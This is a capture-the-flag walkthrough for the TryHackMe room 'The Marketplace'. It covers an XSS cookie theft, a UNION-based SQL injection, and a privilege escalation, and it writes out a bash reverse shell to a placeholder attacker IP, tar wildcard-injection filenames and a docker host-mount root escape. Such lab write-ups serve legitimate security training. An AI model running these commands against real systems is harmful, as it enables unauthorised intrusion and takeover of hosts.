Summary
In this video walk-through, we demonstrated gaining root access to a docker container running a web server with an SQL database. We started off by exploiting a reflected XSS vulnerability in the website that is running an e-commerce marketplace. This enabled us to proceed and gain administrative access to the admin account where we discovered an SQL injection that let us go further and reveal the database records. We used the records to login as SSH and perform privilege escalation by exploiting the wild card in the archiving tool tar which eventually landed us in a docker container. By mounting the root file system to a container of our choice, we were able to extract the root flag.
This post covers the answers for The Marketplace room in TryHackMe.
Initial Reconnaissance & Web Exploitation
I started with an Nmap scan which revealed several open ports: SSH (234), HTTP (80), and another web server on port 32768 running Node.js. The Nmap scan also helpfully discovered an /admin
directory via robots.txt
.
The website itself had typical e-commerce features like login, sign-up, and product listings. I quickly identified the “New Listing” feature as a potential attack vector. After some testing, I found the site was vulnerable to reflected Cross-Site Scripting (XSS).
I crafted a cookie-stealing XSS payload to capture the admin’s cookie when they reviewed a reported listing. My payload was successfully executed, and I captured the admin’s cookie. Using this cookie, I hijacked their session, gaining access to the /admin
page and securing the first flag.
Database Exploitation (SQL Injection)
Within the admin area, I saw user details, and the URL parameters (e.g., user=ID
) immediately struck me as potential SQL injection points.
I systematically explored the database:
- I determined the number of columns using
UNION SELECT
. - I retrieved database names, including
Marketplace
andinformation_schema
. - I dumped table names within the
Marketplace
database, findingitems
,messages
, andusers
. - I retrieved column names within the
users
table:ID
,is_administrator
,password
, andusername
. - I then dumped usernames and password hashes from the
users
table.
Instead of cracking the hashes, I inspected the messages
table. A message there revealed a temporary SSH password for a user. I used this password to log in as the user “Jake” via SSH, which gave me the user flag.
Privilege Escalation
Once I was in as Jake, I checked his sudo
privileges:
sudo -l
This showed that Jake could run a backup.sh
script as the user “Michael” without a password. I viewed the script’s content:
cat /opt/backup.sh
I noticed the backup.sh
script used tar
with a wildcard (*
), which is a known vulnerability! I created a malicious shell script (shell.sh
) containing a netcat reverse shell:
echo 'bash -i >& /dev/tcp/<YOUR_IP>/4545 0>&1' > shell.sh
chmod +x shell.sh
I then exploited the tar
wildcard vulnerability by creating files that would instruct tar
to execute my shell.sh
script during the backup process:
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
On my machine, I set up a Netcat listener:
nc -lvnp 4545
Then, I ran the backup.sh
script as Michael:
sudo -u michael /opt/backup.sh
This triggered the reverse shell, granting me access as Michael. I quickly checked Michael’s groups and found he was part of the docker
group. This was a significant finding!
I listed the Docker images:
docker images
Finally, I exploited the Docker group membership to gain root access to the host system. I ran a Docker container (Alpine) and mounted the host’s entire file system to /mnt
inside the container:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
This effectively gave me a root shell on the host system. I navigated to the /root
directory and retrieved the root flag.
Technical Commands Used:
python -m http.server
(orpython -m SimpleHTTPServer
for Python 2)echo <base64_string> | base64 -d
- SQL Injection Payloads (conceptual, for
UNION SELECT
,information_schema.schemata
,information_schema.tables
,information_schema.columns
, and dumping user data) ssh jake@<IP_ADDRESS>
sudo -l
cat /opt/backup.sh
echo 'bash -i >& /dev/tcp/<YOUR_IP>/4545 0>&1' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
chmod +x shell.sh
sudo -u michael /opt/backup.sh
nc -lvnp 4545
docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
id
ls
cd /root
cat user.txt
cat root.txt
TryHackMe The Marketplace Answers
What is flag 2? (User.txt)
What is flag 3? (Root.txt)